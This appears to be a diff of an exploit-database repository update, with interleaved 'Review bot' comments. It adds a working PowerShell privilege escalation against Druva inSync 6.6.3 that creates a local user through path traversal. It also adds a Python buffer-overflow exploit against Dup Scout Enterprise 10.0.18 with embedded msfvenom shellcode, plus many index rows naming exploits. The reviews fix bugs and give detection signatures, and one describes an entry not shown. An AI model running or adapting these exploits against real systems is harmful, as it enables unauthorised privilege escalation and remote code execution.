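Review bot: this entry omits the `# Exploit:` paragraph the other unquoted-path entries carry, so the reader gets the `sc qc` dump (unquoted `C:\Program Files\Kite\KiteService.exe`, `AUTO_START`, `LocalSystem`) with no statement of impact, precondition or fix; add the standard paragraph and the ImagePath quoting fix. `# Discovery Date: 05-12-2020` is ambiguous and should be ISO.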


@ -0,0 +1,32 @@
# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Date: 2020-12-03
# Exploit Author: 1F98D
# Original Author: Matteo Malvica
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 (x64)
# CVE: CVE-2020-5752
# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
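Review bot: the comment `vulnerable to a command injection attack` does not describe what the script does: the RPC message carries a full executable path, and the `C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe` value walks out of an allowed directory prefix with `..`, which is the path traversal the referenced blog post and CVE-2020-5752 describe; say path traversal. The socket is never shut down or closed after the four `Send` calls; add `$s.Close()`. Two lines end in semicolons and the rest do not. For defenders, the service listens on `127.0.0.1:6064`, so the useful detection is `cmd.exe` spawned as a child of the process bound to that port.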


@ -71,6 +71,8 @@ def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
sleep(0.5)
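Review bot: a new UDP socket is created inside the per-character loop and never closed, so a long string leaks one descriptor per character; create the socket once before the `for` loop, or close it after `sendto`. The hunk is cut off after `sleep(0.5)`, so only four of the eight new lines are visible here.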


@ -0,0 +1,63 @@
# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
# Requires web service to be enabled.
# Tested on Windows 10 Pro (x64)
# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
# Credits: Tulpa and SICKNESS for original exploits
# Modified: @0rbz_
import socket,os,time,struct,argparse,sys
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()
host = args.host
port = 80
# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
buf = ""
buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"
buffer = "\x41" * 260
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 20
buffer += buf
buffer += "\x90" * (10000 - len(buffer))
evil = "POST /online_registration HTTP/1.1\r\n"
evil += "Host: " + sys.argv[2] +"\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "customer_name=" + buffer
evil += "&unlock_key=" + buffer + "\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
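Review bot: the Host header is built from `sys.argv[2]` while the script parses `--host` with argparse into `host`; the two only coincide when `--host` is the first argument, so use `host`. `Content-Length: 17000` does not describe the body, which is two 10000-byte buffers plus the field names. `print 'Sending evil buffer...'` is Python 2 syntax with no interpreter line given. The comment records the payload as a `windows/exec CMD=calc.exe` msfvenom build and the return address `0x10090c83` as a JMP ESP in libspp, which ties the PoC to one build of 10.0.18; stating which build the address was taken from would help reproduction. For defenders, a POST to `/online_registration` whose `customer_name` or `unlock_key` field runs to thousands of bytes is the signature to alert on.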


@ -6763,6 +6763,8 @@ id,file,description,date,author,type,platform,port
49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
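Review bot: rows 49206 and 49207 register the TapinRadio and RarmaRadio PoCs as `.txt`, although both files end in a Python script (`buffer = 'K' * 20000` followed by a file write); either store them as `.py` or keep `.txt` deliberately because the procedure is mostly manual steps, but the choice should be consistent with the files' `Run the python exploit script` instruction.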
@ -10416,6 +10418,7 @@ id,file,description,date,author,type,platform,port
49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
49015,exploits/windows/local/49015.txt,"Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
@ -11218,9 +11221,13 @@ id,file,description,date,author,type,platform,port
49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
49158,exploits/windows/local/49158.txt,"Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
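Review bot: the added entry 49158, "Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path", records the same service binary and the same vulnerability class as the existing entry 49014 ("Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path", visible in the hunk above) under a different author and a lower version. If these are the same unquoted path across consecutive builds, the new record should reference 49014 or one of the two should be marked as a duplicate, rather than the index carrying two independent entries for one issue.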
@ -17886,6 +17893,7 @@ id,file,description,date,author,type,platform,port
42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware,
42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
49210,exploits/windows/remote/49210.py,"Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow",2020-12-07,0rbz_,remote,windows,
48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
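Review bot: the new line for 49210 is inserted between the 2017 entries (42787, 42790, 42793) and the 2020 block that begins at 48816, so this section is no longer in ascending id order; the surrounding lines are otherwise sorted (42787 < 42790 < 42793 < 48816 < 48842 < 48954). Move the 49210 row below the highest existing remote entry (after 48954 at least) so the ordering convention of the file is preserved.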
@ -38777,7 +38785,7 @@ id,file,description,date,author,type,platform,port
39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,webapps,php,80
39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,webapps,php,
39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,webapps,php,
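Review bot: the version ceiling on 39033 changes from "Joomla! 1.5 < 3.4.5" to "Joomla! 1.5 < 3.4.6"; 3.4.6 is the Joomla release that shipped the fix for this x-forwarded-for object injection, so the corrected range is the right one. The change touches only the CSV description, though, and the exploit file 39033.py carries its own header with the affected versions; that header should be checked so the index and the file do not state different upper bounds.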
@ -43199,6 +43207,7 @@ id,file,description,date,author,type,platform,port
48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
48642,exploits/linux/webapps/48642.sh,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution",2020-07-06,"Critical Start",webapps,linux,
48614,exploits/hardware/webapps/48614.txt,"Eaton Intelligent Power Manager 1.6 - Directory Traversal",2020-06-22,"Emre ÖVÜNÇ",webapps,hardware,
48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
@ -43255,6 +43264,7 @@ id,file,description,date,author,type,platform,port
48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,
48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
@ -43324,6 +43334,7 @@ id,file,description,date,author,type,platform,port
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,
49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,
@ -43391,6 +43402,7 @@ id,file,description,date,author,type,platform,port
49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
49165,exploits/multiple/webapps/49165.txt,"Employee Record Management System 1.1 - Login Bypass SQL Injection",2020-12-02,"Anurag Kumar",webapps,multiple,
49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
@ -43402,6 +43414,7 @@ id,file,description,date,author,type,platform,port
49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
@ -43418,3 +43431,6 @@ id,file,description,date,author,type,platform,port
49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,
49204,exploits/php/webapps/49204.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting",2020-12-07,"Pruthvi Nekkanti",webapps,php,
49208,exploits/php/webapps/49208.txt,"Savsoft Quiz 5 - 'Skype ID' Stored XSS",2020-12-07,"Dipak Panchal",webapps,php,
49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php,